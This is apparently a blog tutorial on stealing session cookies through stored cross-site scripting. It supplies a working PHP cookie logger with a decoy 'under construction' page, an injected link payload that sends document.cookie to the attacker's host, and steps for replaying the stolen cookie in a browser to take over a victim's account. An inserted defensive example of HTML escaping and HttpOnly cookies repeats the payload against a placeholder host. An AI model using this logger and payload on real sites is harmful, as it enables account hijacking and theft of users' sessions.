This is a tutorial video on stealing a session cookie with a Cross-Site Scripting (XSS) trick. Once you have the victim's cookie, you can log in to his/her account without ever knowing the password. If you have critiques, suggestions, or questions, just drop your comments here :)

Things you will use:
  1. Notepad
  2. Google
  3. Mozilla 3.0 or higher
  4. Mozilla Addons - Firebug 1.4.5
  5. Mozilla Addons - Firecookie 1.0b4 (extension for Firebug)
  6. Web hosting (use free hosting such as www.0fees.net)
  7. Target website

Scenario:
  1. www.abcde.co.id is a website vulnerable to a Cross-Site Scripting (XSS) attack.
  2. When a member logs in, the system creates a cookie to keep him/her logged in.
  3. Members can post text, including HTML/JavaScript code, in a textbox, and even non-logged-in users can see that text (a stored XSS).
  4. So, an attacker puts a link in the textbox to trap other members.
  5. That link actually executes a cookie-stealing script that the attacker has uploaded to a web host beforehand.
  6. If another member sees and clicks the link, his/her cookie is logged to a text file on the attacker's web host.
  7. Then the attacker opens the text file and reads the cookie name and values.
  8. Using the Firebug and Firecookie add-ons in Mozilla, the attacker copies that cookie into the browser and logs in to www.abcde.co.id with the target's account, without knowing the target's password.
Now, here's the tutorial:
  • Open Notepad and copy and paste the code below.
<?php
// Read the cookie value passed in the query string.
// $HTTP_GET_VARS is deprecated/removed in modern PHP; $_GET is the equivalent.
$cookie = $_GET["cookie"];
// Timestamp, e.g. "Monday 01st of January 2011 10:15:30 AM" ("\of" keeps the literal word "of").
$date = date('l dS \of F Y h:i:s A');
$user_agent = $_SERVER['HTTP_USER_AGENT'];
// Append one line per request to log.txt.
$file = fopen('log.txt', 'a');
fwrite($file, "DATE : $date || USER AGENT : $user_agent || COOKIE : $cookie \n");
fclose($file);

// Decoy page shown to the visitor.
echo '<br>Sorry, this page is under construction<br><br><br>Please click <a href="http://www.anywebsiteyouwanttorefer.com">here</a> to go back to previous page.';
?>
  • Then save it as "something.php".
  • Create a new Notepad file, leave it empty, and save it as "log.txt".
  • Now go to your web hosting (if you don't have one, you can register at www.0fees.net for free).
  • Upload the files you created, "something.php" and "log.txt", into htdocs (other web hosts may use a different directory). ** DON'T FORGET TO WRITE DOWN THE URL OF SOMETHING.PHP **
  • Change the permissions of the files to 777 using chmod.
  • Now go to www.abcde.co.id (the target website) and, using your own or a friend's account, inject the HTML/JavaScript code into the textbox.
Copy and paste the code below into the textbox :

<a onclick="document.location='http://www.yourweb.0fees.net/something.php?cookie='+escape(document.cookie);" href="#">Click Here For Details.</a>

Wait for a victim, assuming someone will log in to the website.
  • If luck is on the attacker's side, the victim sees the link and clicks it. It goes straight to the page that says "The page is under construction", as written in something.php. Then the victim clicks the back link and everything returns to the normal page, so the victim has no reason to think anything suspicious happened on the previous page.
  • Now the attacker can open log.txt and get the victim's cookie names and values.
  • Once you have the cookie, decode the URL-encoded value back to ASCII (www.centricle.com has an ASCII converter).
  • The attacker will find out the victim's username.
  • The attacker clears all cookies in Mozilla, then opens the Firebug add-on to create and edit the cookie.
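For the other side of this scenario, here is a defender-side example, added here and not part of the original post, showing the two controls that break it: HTML-escaping the member's post so the injected tag is rendered as text rather than markup, and issuing the session cookie with HttpOnly so document.cookie cannot read it. The cookie name and the attacker.example host are constructed placeholders.

```javascript
// Added defender-side example (not code from the original post).

// Escape the five HTML metacharacters so user-supplied text is rendered as
// text and never parsed as markup. This output-encoding step is exactly what
// the vulnerable textbox in the scenario lacks.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a member's post into the page. Everything the member typed goes
// through escapeHtml, so an injected <a onclick=...> shows up as literal text.
function renderPost(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Build a Set-Cookie header for the session. HttpOnly stops document.cookie
// from exposing the value to any script that does run; Secure and SameSite
// limit where the browser will send it.
function sessionCookieHeader(name, value, maxAgeSeconds) {
  const safeValue = encodeURIComponent(value);
  return `${name}=${safeValue}; Path=/; Max-Age=${maxAgeSeconds}; HttpOnly; Secure; SameSite=Lax`;
}

// Audit helper: true when a Set-Cookie header lacks HttpOnly, i.e. the cookie
// would be readable through document.cookie by an injected script.
function cookieExposedToScript(setCookieHeader) {
  const attrs = setCookieHeader.split(';').slice(1).map((a) => a.trim().toLowerCase());
  return !attrs.includes('httponly');
}

// Constructed sample: the payload from the tutorial, posted as a comment
// (attacker.example is a placeholder host).
const constructedPayload =
  '<a onclick="document.location=\'http://attacker.example/something.php?cookie=\'+escape(document.cookie);" href="#">Click Here For Details.</a>';

console.log(renderPost('member1', constructedPayload));
console.log(sessionCookieHeader('SESSIONID', 'constructed-session-value', 3600));
```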
There's still more, I will update it later... need sleep now..!

© Copyright XAND™ | Hacking For Education 2010 - 2011. Powered by Blogger.